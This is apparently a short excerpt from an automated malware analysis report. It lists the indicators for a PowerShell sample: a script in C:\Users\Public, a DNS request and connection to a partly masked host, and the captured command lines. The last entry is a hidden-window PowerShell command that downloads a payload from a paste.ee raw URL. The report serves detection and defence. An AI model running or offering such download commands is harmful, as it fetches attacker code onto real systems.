Technical information
- C:\users\public\sab80.ps1
- 'pa##e.ee':443
- DNS ASK pa##e.ee
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy RemoteSigned -File C:\Users\Public\sAB80.PS1
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy RemoteSigned -Command [System.Net.WebClient] $Client = New-Object System.Net.WebClient; [Byte[]] $DownloadedData = $Client.DownloadData('https://paste.ee/r/sAB80/0'); [String] ...' (with a hidden window)